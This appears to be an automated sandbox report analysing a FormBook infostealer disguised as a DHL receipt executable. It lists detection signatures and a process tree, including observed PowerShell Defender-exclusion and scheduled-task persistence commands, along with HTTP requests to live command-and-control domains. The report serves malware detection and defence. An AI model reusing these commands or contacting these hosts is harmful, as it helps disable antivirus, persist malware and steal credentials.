
Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name: DHL AWB Receipt_pdf.bat.exe
Analysis ID: 1627806
MD5: 3223bedb21ba57b91733676031df958a
SHA1: 25cfec6a2b4e9c1cc51fcf343bbef54fcef8c3b9
SHA256: 84c2a2d742fbccab3644af070d779ef71e8f377a6ab8d1a83127d2605622f105
Tags: bat, DHL, exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DHL AWB Receipt_pdf.bat.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 3223BEDB21BA57B91733676031DF958A)
    • powershell.exe (PID: 2860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2436 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 3536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 1972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • ctd5Fl0jEEYLVK.exe (PID: 4500 cmdline: "C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • EhStorAuthn.exe (PID: 7436 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
          • ctd5Fl0jEEYLVK.exe (PID: 1252 cmdline: "C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\cvLwNUeE0ZCpMF.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • oSJLRdDbLeQ.exe (PID: 5592 cmdline: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe MD5: 3223BEDB21BA57B91733676031DF958A)
    • schtasks.exe (PID: 7376 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
10.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
10.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe, ParentImage: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe, ParentProcessId: 5592, ParentProcessName: oSJLRdDbLeQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp", ProcessId: 7376, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", ProcessId: 2436, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 2860, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 3180, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp", ProcessId: 2436, ProcessName: schtasks.exe
No Suricata rule has matched

AV Detection

Source: http://www.quo1ybjmkhdqljoz.top/19my/; Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/19my/?-n=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&ahd=WXQDI8; Avira URL Cloud: Label: malware
Source: http://www.publicblockchain.xyz/lp5v/?ahd=WXQDI8&-n=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA==; Avira URL Cloud: Label: malware
Source: http://www.publicblockchain.xyz/lp5v/; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe; ReversingLabs: Detection: 50%
Source: DHL AWB Receipt_pdf.bat.exe; ReversingLabs: Detection: 50%
Source: DHL AWB Receipt_pdf.bat.exe; Virustotal: Detection: 45%
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000012.00000002.4686556530.0000000000990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.4687868564.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.4687804646.0000000004880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2485690943.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2480555457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.4688006537.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2481904165.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: DHL AWB Receipt_pdf.bat.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DHL AWB Receipt_pdf.bat.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2482295346.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688190517.0000000004D8E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2480821432.0000000004880000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2483621408.0000000004A47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000A.00000002.2481415906.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4687129430.000000000073E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002CFB000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4688612074.000000000521C000.00000004.10000000.00040000.00000000.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4688182226.00000000029FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2783296706.000000002336C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ctd5Fl0jEEYLVK.exe, 0000000E.00000002.4686746546.000000000045F000.00000002.00000001.01000000.0000000D.sdmp, ctd5Fl0jEEYLVK.exe, 00000014.00000002.4686554692.000000000045F000.00000002.00000001.01000000.0000000D.sdmp

Networking

Source: DNS query: www.031233435.xyz
Source: DNS query: www.publicblockchain.xyz
Source: DNS query: www.multo.xyz
Source: Joe Sandbox View; IP Address: 144.76.229.203
Source: Joe Sandbox View; IP Address: 23.29.115.2
Source: Joe Sandbox View; ASN Name: HETZNER-ASDE
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /wuv4/?ahd=WXQDI8&-n=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCRNuXwDr216DBxJqwrztqafm0gN7GWo7wazhUvMW/D9sNzA== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.loonerverse.app | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /esw3/?-n=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjTWldf3EKfrFwCElolvucyT5INFTCRjeylmDK6mihpn7uUQ==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.primepath.net | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /frae/?-n=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kku1OzbK5yiK6noV5aH1cMop/1tMHAh9Rfx/ZornT1cvdxLg==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.031233435.xyz | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /19my/?-n=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.quo1ybjmkhdqljoz.top | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /lp5v/?ahd=WXQDI8&-n=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA== HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.publicblockchain.xyz | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /piuf/?-n=YCNZp8d5iXit/W0AorWaWt7d4xAAmtdp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURu2gkZni0KV25495YYQVjjOAmXfWkpHxpYmfFMe+ykUCf6A==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.multo.xyz | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ty1w/?-n=DmU+BbsPdbeZ2oth7eqVH4IxkOLk6Zp/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DKB7uL0+Vw2px/OOdkCjvCA4RBa4gXyq2/Cl2LwjArqGdZw==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.tkloqr.info | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /acnz/?-n=4AOqIRL3pTX0nNGi+lOPSRSyx/iWc+VNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmlygepuDbgjx8TrlAGHAV/0a3Ooi8Z9K5OsEAJsLCu/irBQ==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.streaay.live | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /qnz1/?-n=R+Oteo3rh3f7nhB2gSiRNKBizK43zE0qallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvUuxTTHBcMTuCJqSn7igyXIXCBr+LpjPOdBGcjRnmk/kZJw==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.77zhibo.net | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /bio5/?-n=7nMcQ+p/VAEQ2azQobfLLk4wRClPro4nkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH6uuiHc4YC+tLjkWWBGbbvYq75oa+pjtqeeHcG0lj96z8LA==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.thefounder.ceo | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected: GET /2dxw/?-n=53Ecfr8B68ed/Blg+8N/NSWf2AxVSX5XzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDzdYfw3xDcQr8Se8sECh3iguJ/J/JYFBf2UKrXqcOWenkdA==&ahd=WXQDI8 HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | Host: www.rbopisalive.cyou | User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.loonerverse.app
Source: global traffic; DNS traffic detected: DNS query: www.primepath.net
Source: global traffic; DNS traffic detected: DNS query: www.031233435.xyz
Source: global traffic; DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic; DNS traffic detected: DNS query: www.publicblockchain.xyz
Source: global traffic; DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic; DNS traffic detected: DNS query: www.tkloqr.info
Source: global traffic; DNS traffic detected: DNS query: www.streaay.live
Source: global traffic; DNS traffic detected: DNS query: www.77zhibo.net
Source: global traffic; DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic; DNS traffic detected: DNS query: www.rbopisalive.cyou
